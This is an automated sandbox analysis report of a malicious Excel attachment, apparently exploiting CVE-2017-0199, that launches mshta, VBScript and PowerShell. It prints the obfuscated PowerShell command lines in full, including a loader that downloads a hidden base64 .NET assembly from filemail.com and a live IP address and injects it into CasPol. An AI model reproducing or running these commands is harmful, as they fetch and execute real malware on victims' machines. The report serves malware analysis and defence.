iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jepqemwgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrklvrzugugicagicagicagicagicagicagicagicagicagicagicatbuvtykvyzevmau5pvglptiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb24ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbyvkzqy0wsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagz09oz0j5lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihhhlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbtaejpleludfb0ciagicagicagicagicagicagicagicagicagicagicagigzqt0vmktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiaxf3usigicagicagicagicagicagicagicagicagicagicagicattkfnrxnqyunlicagicagicagicagicagicagicagicagicagicagicageuziu21revdjicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrkuhpsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzuvmtmyms9zzwv0agvizxn0dghpbmdzzw50axjldgltzxdoawnoz2l2zw5izxn0zgvzawduzm9yew91cnroaw5ncy50suyilcikru52okfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3agljagdpdmvuymvzdgrlc2lnbmzvcnlvdxj0ac52qnmildasmck7c1rbcnqtc2xlrxaomyk7sukgicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxhnlzxrozwjlc3r0agluz3nlbnrpcmv0aw1ld2hpy2hnaxzlbmjlc3rkzxnpz25mb3j5b3vydggudkjzig=='+[char]0x22+'))')))"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrqu2hvbuvbnf0rjhbtag9nzvszmf0rj1gnksgoj2uzjysnswltywcnkydlvxjsid0gsgv1ahr0chm6ly8zmta1lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1zafrqsgjdufg4by1st3rdcuhmrzzfjysnmhhdes14bdr0bnhsqvziutk1lwr2avrljysnnwnbumfozffqymizbwv4zndrekttvfhnjnnraxbyzwc9dhj1zszwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi1mzezmdlinwzmn2mgsgv1o2uzsxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7ztnjaw1hjysnz2vcexrljysncya9iguzsxdlyknsawvudc5eb3dubg9hzerhdgeoztnjaw1hz2vvcmwpo2uzswltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluzycrj106olvurjgur2v0u3ryaw5nkguzswltywdlqnl0zxmnkycpo2uzsxn0yscrj3j0rmxhzycrjya9iehldtw8qkftrty0x1nuqvjupj5izxu7ztnjzw5krmxhzya9jysniegnkydldtw8qkftrty0x0vord4+sgv1o2uzsxn0yxj0sw5kzxggpsblm0lpbwfnzvrlehqusw5kzxhpzihlm0lzdgfydezsywcpo2uzswvuzeluzgv4id0gztnjaw1hz2vuzxh0lkluzgv4t2yoztnjzw5krmxhzyk7ztnjc3rhcnrjbicrj2rlecatz2ugmcatyw5kiguzswvuzeluzgv4ic0nkydndcblm0lzdgfydeluzgv4o2uzsscrj3n0yxj0sw5kzxggkz0gztnjc3rhcnqnkydgbgfnlkxljysnbmd0adtlm0liyxnlnjrmzw5ndgggpsblm0llbmrjbmrlecatiguzsxn0yxj0sw5kzxg7ztmnkydjymfzzty0q29tbwfuzca9iguzswltywdlvgv4dccrjy5tdwjzdhjpbmcoztnjc3rhcnrjbmrlecwgztnjymfzzty0tgvuz3rokttlm0liyxnlnjrszscrj3ynkydljysncnnlzca9ic1qb2luichlm0liyxnlnjrdb21tyw5kllrvq2gnkydhckfycmf5kckga1vpiezvckvhy2gtt2jqzwn0ihsgztnjxyb9kvstms4ulshlm0liyxnlnjrdb21tyw5klkxlbmd0acldo2uzsscrj2nvbscrj21hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnlnjrtdhjpbmcozscrjznjymenkydzzty0umv2zxjzzwqpo2uzjysnswxvywrljysnzefzc2vtymx5id0gw1n5c3rljysnbs5sjysnzwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchlmycrj0ljb21tyw5kqnl0zxmpo2uzsxzhau1ldghvzcankyc9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qosgv1vkfjsgv1kttlm0l2ywlnzxrob2qusw52b2tlkguzsw51bgwsieaosgv1dhh0jysnlk1stufdlzeymzevntcxljq0lji3ms43mdevlzpwdhrosgv1lcbizxvkzxnhdgl2ywrvsgv1lcbizxvkzxnhdccrj2l2ywrvsgv1lcankydizxvkzxnhdgl2ywrvsgv1lcbizxvdyxnqb2xizxusiehldwrlc2f0axzhzg9izxusiehldwrlc2f0axzhzg9izxussgunkyd1zgvzyxrpdmfkbycrj0hldsxizxvkzxnhdgl2ywrvsgv1lehldwrlc2f0axzhzg9izxussgv1zgvzyxrpdmfkb0hldsxizxvkzxnhdgl2ywrvsgv1lehldtfizxussgv1zccrj2vzyxrpdmfkb0gnkydldskpoycplnjfugxhq0uokftjsefsxtcyk1tjsefsxtewmstby0hbul0xmtcplfttvfjjtkddw2niqvjdmzkplnjfugxhq0uokftjsefsxtewnytby0hbul04nstby0hbul0xmduplfttvfjjtkddw2niqvjdmti0ks5yrvbsyunfkcdlm0knlcckjykgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $pshome[4]+$pshome[30]+'x')(('e3'+'iimag'+'eurl = heuhttps://3105.filemail.com/api/file/get?filekey=shtphbcpx8o-lotcqhlg6_'+'0xcy-xl4tnxlavbq95-dvitk'+'5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c heu;e3iwebclient = new-object system.net.webclient;e3iima'+'gebyte'+'s = e3iwebclient.downloaddata(e3iimageurl);e3iimagetext = [system.text.encoding'+']::utf8.getstring(e3iimagebytes'+');e3ista'+'rtflag'+' = heu<<base64_start>>heu;e3iendflag ='+' h'+'eu<<base64_end>>heu;e3istartindex = e3iimagetext.indexof(e3istartflag);e3iendindex = e3iimagetext.indexof(e3iendflag);e3istartin'+'dex -ge 0 -and e3iendindex -'+'gt e3istartindex;e3i'+'startindex += e3istart'+'flag.le'+'ngth;e3ibase64length = e3iendindex - e3istartindex;e3'+'ibase64command = e3iimagetext'+'.substring(e3istartindex, e3ibase64length);e3ibase64re'+'v'+'e'+'rsed = -join (e3ibase64command.toch'+'ararray() kui foreach-object { e3i_ })[-1..-(e3ibase64command.length)];e3i'+'com'+'mandbytes = [system.'+'convert]::frombase64string(e'+'3iba'+'se64reversed);e3'+'iloade'+'dassembly = [syste'+'m.r'+'eflection.assembly]::load(e3'+'icommandbytes);e3ivaimethod '+'= [dnlib.io.home].getmethod(heuvaiheu);e3ivaimethod.invoke(e3inull, @(heutxt'+'.mrmac/1231/571.44.271.701//:ptthheu, heudesativadoheu, heudesat'+'ivadoheu, '+'heudesativadoheu, heucaspolheu, heudesativadoheu, heudesativadoheu,he'+'udesativado'+'heu,heudesativadoheu,heudesativadoheu,heudesativadoheu,heudesativadoheu,heu1heu,heud'+'esativadoh'+'eu));').replace(([char]72+[char]101+[char]117),[string][char]39).replace(([char]107+[char]85+[char]105),[string][char]124).replace('e3i','$') )"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information121
      Scripting
      Valid Accounts121
      Command and Scripting Interpreter
      121
      Scripting
      11
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Process Discovery
      Remote Services1
      Email Collection
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts23
      Exploitation for Client Execution
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      21
      Virtualization/Sandbox Evasion
      LSASS Memory21
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Archive Collected Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts4
      PowerShell
      Logon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager1
      Application Window Discovery
      SMB/Windows Admin Shares1
      Clipboard Data
      2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS1
      Remote System Discovery
      Distributed Component Object ModelInput Capture13
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
      Obfuscated Files or Information
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Install Root Certificate
      Cached Domain Credentials14
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1563179 Sample: Shipping Document.xla.xlsx Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 76 Suricata IDS alerts for network traffic 2->76 78 Malicious sample detected (through community Yara rule) 2->78 80 Multi AV Scanner detection for submitted file 2->80 82 17 other signatures 2->82 11 EXCEL.EXE 29 23 2->11         started        process3 dnsIp4 64 107.172.44.175, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 11->64 66 ljg.cl 152.231.102.107, 443, 49163, 49165 ENTELCHILESACL Chile 11->66 52 C:\Users\...\~$Shipping Document.xla.xlsx, data 11->52 dropped 54 seethebestthignswi...retimeforall[1].hta, HTML 11->54 dropped 98 Microsoft Office drops suspicious files 11->98 16 mshta.exe 10 11->16         started        file5 signatures6 process7 dnsIp8 58 ljg.cl 16->58 72 Suspicious powershell command line found 16->72 74 PowerShell case anomaly found 16->74 20 powershell.exe 24 16->20         started        signatures9 process10 file11 48 seethebestthingsen...designforyourth.vBs, Unicode 20->48 dropped 50 C:\Users\user\AppData\...\cfogy1ty.cmdline, Unicode 20->50 dropped 84 Suspicious powershell command line found 20->84 86 Obfuscated command line found 20->86 24 wscript.exe 1 20->24         started        27 powershell.exe 4 20->27         started        29 csc.exe 2 20->29         started        signatures12 process13 file14 88 Suspicious powershell command line found 24->88 90 Wscript starts Powershell (via cmd or directly) 24->90 92 Bypasses PowerShell execution policy 24->92 96 2 other signatures 24->96 32 powershell.exe 2 24->32         started        94 Installs new ROOT certificates 27->94 56 C:\Users\user\AppData\Local\...\cfogy1ty.dll, PE32 29->56 dropped 35 cvtres.exe 29->35         started        signatures15 process16 signatures17 68 Suspicious powershell command line found 32->68 70 Obfuscated command line found 32->70 37 powershell.exe 12 4 32->37         started        process18 dnsIp19 60 ip.3105.filemail.com 193.30.119.205, 443, 49168 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown 37->60 62 3105.filemail.com 37->62 40 CasPol.exe 37->40         started        42 CasPol.exe 37->42         started        44 CasPol.exe 37->44         started        46 2 other processes 37->46 process20

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Shipping Document.xla.xlsx21%ReversingLabsWin32.Exploit.CVE-2017-0199
      Shipping Document.xla.xlsx100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd0%Avira URL Cloudsafe
      http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIFp0%Avira URL Cloudsafe
      https://3105.filemail.com/0%Avira URL Cloudsafe
      http://107.172.44.175/1321/CAMRM.txt0%Avira URL Cloudsafe
      https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0%Avira URL Cloudsafe
      http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF0%Avira URL Cloudsafe
      http://107.172.44.175/1321/seeth0%Avira URL Cloudsafe
      http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentireti0%Avira URL Cloudsafe
      http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF:0%Avira URL Cloudsafe
      http://107.172.44.175/0%Avira URL Cloudsafe
      https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c0%Avira URL Cloudsafe
      https://3105.filemail.com/api/file/get?filekey=shTPHbC0%Avira URL Cloudsafe
      https://ljg.cl/0%Avira URL Cloudsafe
      http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta0%Avira URL Cloudsafe
      https://3105.filemail.com0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      ip.3105.filemail.com
      193.30.119.205
      truetrue
        unknown
        ljg.cl
        152.231.102.107
        truefalse
          unknown
          3105.filemail.com
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            http://107.172.44.175/1321/CAMRM.txttrue
            • Avira URL Cloud: safe
            unknown
            http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIFtrue
            • Avira URL Cloud: safe
            unknown
            https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7ctrue
            • Avira URL Cloud: safe
            unknown
            http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.htatrue
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://3105.filemail.com/powershell.exe, 0000000C.00000002.669105393.000000001A8FE000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdpowershell.exe, 0000000E.00000002.572052356.0000000002642000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.533738321.0000000012001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://ocsp.entrust.net03mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIFppowershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://107.172.44.175/1321/seethpowershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://go.microspowershell.exe, 00000005.00000002.530318649.0000000003390000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_powershell.exe, 0000000E.00000002.571567594.0000000000278000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://107.172.44.175/mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimshta.exe, 00000004.00000003.501201143.000000000036D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503022942.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://contoso.com/powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.533738321.0000000012001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF:powershell.exe, 00000005.00000002.529441146.000000000030E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ljg.cl/mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.505717437.000000000036D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.501201143.0000000000377000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.506606458.000000000036D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003820000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.530318649.0000000001FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.660953442.0000000002462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.572052356.0000000002441000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://3105.filemail.com/api/file/get?filekey=shTPHbCpowershell.exe, 0000000C.00000002.669105393.000000001A8FE000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://go.crpowershell.exe, 00000005.00000002.534757424.000000001C22D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://3105.filemail.compowershell.exe, 0000000E.00000002.572052356.0000000002642000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            193.30.119.205
                                            ip.3105.filemail.comunknown
                                            680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                                            152.231.102.107
                                            ljg.clChile
                                            6471ENTELCHILESACLfalse
                                            107.172.44.175
                                            unknownUnited States
                                            36352AS-COLOCROSSINGUStrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1563179
                                            Start date and time:2024-11-26 15:47:07 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 12s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:22
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
